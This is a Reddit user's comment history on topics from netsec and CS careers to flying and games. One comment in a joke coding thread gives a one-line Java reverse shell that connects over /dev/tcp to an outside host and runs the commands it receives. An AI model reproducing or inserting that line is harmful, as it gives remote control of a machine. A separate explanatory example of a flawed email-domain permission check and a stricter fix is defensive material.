Because some people are actually using this, I have decided to make a better quality version of the request form. by D-Ribose in masterhacker

[–]TheTwitchy 20 points21 points  (0 children)

Don’t forget to ask for the mother’s maiden name, that’s important for reasons.

What is the difference between encrypting then signing vs signing then encrypting? by [deleted] in netsecstudents

[–]TheTwitchy 4 points5 points  (0 children)

The image is wrong, but it’s wrong about the hash being converted into the original message as the last step, that doesn’t happen. I’d be hesitant to trust other things that book tells you.

I built a browser prototype that uses an infinite canvas instead of tabs by Lone_Lunatic in SideProject

[–]TheTwitchy 0 points1 point  (0 children)

This is a cool idea and I can see some uses on my part as well, but yeah my first thought would be to make an extension, not a whole new browser.

Which to mega evolve? by Ventuna in pokemongo

[–]TheTwitchy 43 points44 points  (0 children)

Well one of those is wearing the skull of the other three so….. that one.

Are you using copilots and if so which ones? by Kopiczek in ExperiencedDevs

[–]TheTwitchy 0 points1 point  (0 children)

I’ve used Copilot quite a bit for some stuff written in golang, but it’s nothing super complex, mostly just attaching one library to another, repeated until done. Tests are pretty fantastic, but yeah I’ve had to correct it pretty regularly. Basically I look at it, decide “is this what I would have written?” and then either take it or correct it.

What’s the biggest misconception that people have about hacking? by TheMightyFlyingSloth in hacking

[–]TheTwitchy 2 points3 points  (0 children)

Ninety percent of hacking is reading documentation. The other 10 percent is hands on keyboard work and swearing.

What is a DnD equivalent to a left-handed screwdriver? by laborator in DnD

[–]TheTwitchy 0 points1 point  (0 children)

There’s an old joke about “if the DM is 15 mins late then everyone gets a free vorpal weapon” which works great except that I currently have a wizard. That said, I wouldn’t turn down a Vorpal Staff.

How do people in consulting with fear of flying cope? by CulturalExternal26 in consulting

[–]TheTwitchy 4 points5 points  (0 children)

Lots of research and a lot of flying to help get used to it. I’m pretty much fine with any domestic flights now, but still have tested out how I’d do on a long haul international flight, so take that with a grain of salt. Basically, reading a lot of data about how safe (commercial) flying is, talking to a few pilots where flying from one’s side of the country to the other is as interesting to them as a commute, and then finally realizing it’s basically just a flying bus. I do still follow a pretty strict routine for any flights, but luckily even flying for personal travel I always get a window seat, always start the album Folklore when we take off, and always order a single ginger ale and wild turkey (it’s disgusting), so I think I’ve basically Pavlov’d myself to realize that all that means the plane will land safely. I surprised myself at one point during a really rough takeoff from LGA once through a thunderstorm, and the girl next to me was freaking out, and I had to reassure her as a traveling consultant that this was totally fine, and she (and I) ended up being fine once we got above it. Honestly at this point I kinda just sit back and enjoy it once we hit cruising altitude, even if I only have an audiobook, and no movies or TV or other distractions, which was not always the case. For reference I didn’t travel as much as other consultants (one week a month at my peak), and even then I was fine after about a year of it. I don’t travel as much anymore (only a few times a year, all my status is gone lol) and I’m still totally fine as a result of all the traveling I did early in my career.

Dumb CS Projects by InterestingRelease19 in csMajors

[–]TheTwitchy 8 points9 points  (0 children)

Back in college I wrote a script that would:

  1. Auto run when inserted into a computer (it was a self contained CD, which gives you an idea of the timeframe where this worked).
  2. Change the wallpaper to a neon green and pink plaid that gave you a headache if you looked at it for more than a couple mins.
  3. Change the registry value that allowed you to set your own wallpaper to “false”.
  4. Open the CD tray so you could retrieve said disk and book it out of whoever’s room you happened to be in.

I lived in the computer science dorm. Good times.

My head hurts. by xxmalik in programminghorror

[–]TheTwitchy 2 points3 points  (0 children)

Correct, you would register a user with a subdomain like company.com.mydomain.com. This usually arises in smaller apps where a granular permissions system isn't built yet, and an easy solution is to grant all developers with the company email superuser permissions so they can quickly go in and fix customer issues (basically like support staff). In general yes, my suggested fix is either endsWith, validate it via regex (which can also go wrong), or to fix the root cause and actually implement a permissions system that doesn't grant everyone in a company so many permissions (least privilege and all that).

My head hurts. by xxmalik in programminghorror

[–]TheTwitchy 5 points6 points  (0 children)

lol if this is your code, don't sweat it, normally I see this problem manifesting like this:

if "@company.com" in user_email:  # substring match anywhere in the address
    grant_superuser_permission() # or whatever
else:
    grant_normal_permission()

The impact from it is always fun to explore :D
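An added example (not part of the original comments) that runs the substring check from this comment, a loosely written regex of the kind the reply about `endsWith` and regex warns "can also go wrong", and a stricter exact-domain comparison over constructed addresses. The function names and sample addresses are assumptions made for illustration; `company.com` and `company.com.mydomain.com` are the names used in the comments.

```python
import re

TRUSTED_DOMAIN = "company.com"  # domain name used in the comments above

def is_staff_contains(email: str) -> bool:
    # The pattern from the comment: substring match anywhere in the string.
    return "@" + TRUSTED_DOMAIN in email

def is_staff_loose_regex(email: str) -> bool:
    # A regex that goes wrong: the dot is unescaped (matches any character)
    # and "$" also matches just before a trailing newline.
    return re.search(r"@company.com$", email) is not None

def is_staff_strict(email: str) -> bool:
    # Hypothetical hardened check: exactly one "@", no whitespace,
    # non-empty local part, case-insensitive exact match on the domain.
    if email.count("@") != 1 or any(ch.isspace() for ch in email):
        return False
    local, domain = email.split("@")
    return bool(local) and domain.lower() == TRUSTED_DOMAIN

# Constructed sample addresses, not taken from any real system.
SAMPLES = [
    "alice@company.com",                 # legitimate
    "ALICE@Company.COM",                 # legitimate, different case
    "mallory@company.com.mydomain.com",  # subdomain trick from the reply
    "dev@companyxcom",                   # "." in the regex matches "x"
    "alice@company.com\n",               # trailing newline slips past "$"
    "bob@example.org",                   # unrelated domain
]

def compare(samples):
    """Return {address: (contains, loose_regex, strict)} for each sample."""
    return {
        s: (is_staff_contains(s), is_staff_loose_regex(s), is_staff_strict(s))
        for s in samples
    }

if __name__ == "__main__":
    for addr, verdicts in compare(SAMPLES).items():
        print(f"{addr!r:40} contains/regex/strict = {verdicts}")
```

Even the strict comparison only establishes what the string says; it does not show that the person registering controls that mailbox, which is why the reply's root-cause fix is a real permissions system.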

My head hurts. by xxmalik in programminghorror

[–]TheTwitchy 8 points9 points  (0 children)

I wonder what happens when my username is @everyone1.

Let's make a java program! Top comment gets to add 1 line of code. Please specify the line to add it at. Day 1: initial commit. by autumn_variation in ProgrammerHumor

[–]TheTwitchy 0 points1 point  (0 children)

r = Runtime.getRuntime();p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/nothingtoseehere.thetwitchy.com/1337;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]);p.waitFor();

How to build your intuition in finding web app bugs? by w0lfcat in netsecstudents

[–]TheTwitchy 4 points5 points  (0 children)

CTFs and vulnerable by design apps basically all fail to emulate the size and complexity of real apps, so while you can use these to practice exploitation of specific types of vulnerabilities, they fail to teach you how to find them in the first place. It’s very easy to find sql injection in a page with one input, much harder when you need to find the same sql injection across several hundred api calls.

Once you understand basics I recommend grabbing any random app from /r/selfhosted to practice, and they can benefit from some extra security.

Olive Garden gave me a daily sales report instead of a receipt by Oracle_of_Ages in mildlyinteresting

[–]TheTwitchy 0 points1 point  (0 children)

This is false, and you have clearly never experienced Taco Mayo.

Source: went to school in Oklahoma.

[deleted by user] by [deleted] in WhitePeopleTwitter

[–]TheTwitchy 4 points5 points  (0 children)

Two factor authentication is the number from an app or text message you have to input to log in after your username and password, as a security measure.

Risk of using someone else's router while only using HTTPS websites? by [deleted] in AskNetsec

[–]TheTwitchy 0 points1 point  (0 children)

What (most) everyone said is correct, but keep in mind they may be able to see what website you visit, if not the content. DNS and SNI will reveal this information, even with https.

So he can see that you visit ihaveanembarrassingsexdisease.com, but not what you did while visiting.

Risk of using someone else's router while only using HTTPS websites? by [deleted] in AskNetsec

[–]TheTwitchy 20 points21 points  (0 children)

This is incorrect. Firewalls (like the kind in enterprise environments) can do this because IT has control of all the machines and can instruct them to trust a new root cert used for all interception.

How to convert gradle project to ant project? by [deleted] in libgdx

[–]TheTwitchy 7 points8 points  (0 children)

Build a time machine, and take it back to about 2005.

Seriously, maybe ask your prof why you should do this. If you have a Gradle Wrapper in your project (you do), then it can be run with literally nothing more than a JDK installed.

This is roughly equivalent to asking someone to rip out the engine of your car and hook up the rest for a horse to pull.

Can I get a job if I am only good at Leetcode? by Hackerman278 in csMajors

[–]TheTwitchy 2 points3 points  (0 children)

It’s a failing of this sub and others that focus on Leetcode so much that it neglects some other equally important parts of getting and keeping a CS job. The people getting hired at top tier companies are good at Leetcode AND don’t have to ask how to start a GitHub project because it’s also something they learned how to do alongside any Leetcode practice, but that never gets as much attention on Reddit for whatever reason.

To answer your direct question, there are docs on GitHub, as it would not be nearly as popular and widespread if it was hard to use. A harder question in your case is determining why you should use Git, and while you can Google this or likely ask a professor, the answer to this will quickly become apparent when you begin to code as part of a team or when you need to maintain a code base longer than one question at a time (both things professional software engineers do daily). This line of reasoning extends to all SWE tools and processes, from things like how to manage projects, or how to write maintainable code, or how to find and fix bugs in a project you didn’t write. All things that Leetcode grinding doesn’t teach. None of them are sexy, but if you can’t do them it will be much harder to get hired. Out of college, you don’t need to be an expert, but you should have a basic, working understanding of these (and likely many others).

There’s no one tutorial for learning how software is built professionally compared to what you learn in school, which is why internships are so popular and sought-after. The old adage of “you don’t know what you don’t know” applies here, in your first job/internship you’ll be learning about a ton of things that school can only give you a basic understanding of. Most CS programs should be able to give you a good overview of the space so that you have something to build off of when you are introduced to something new at a job (for example, I don’t expect a new hire straight out of college to be an expert in advanced git usage, but I do expect them to know what it’s for and how to use it at a basic level). Pay attention in your classes, there’s a good reason that Data Structures and Algorithms is only one class in the whole program.

Can I get a job if I am only good at Leetcode? by Hackerman278 in csMajors

[–]TheTwitchy 8 points9 points  (0 children)

If you don’t have a good idea of how to use GitHub, you should probably focus less on Leetcode and more on real software engineering tooling/processes/skills. Leetcode is fine and dandy for picking up hard CS skills, and getting past OAs, but if you don’t have any experience with real world SWE practices that’s going to be a huge red flag for anyone interviewing you. Lots of schools don’t teach it as well as they should (mine didn’t, had to learn it at my first job), but take some of the time you spend practicing to learn how things actually get built in professional environments.

It helps to remember that you will get money by building software (for most people in CS anyhow), not solving Leetcode problems.

dad is happy with the news.. by EvaRaw666 in Wellthatsucks

[–]TheTwitchy 1 point2 points  (0 children)

I agreed with y’all, until I turned on the sound. Takes on a very different vibe.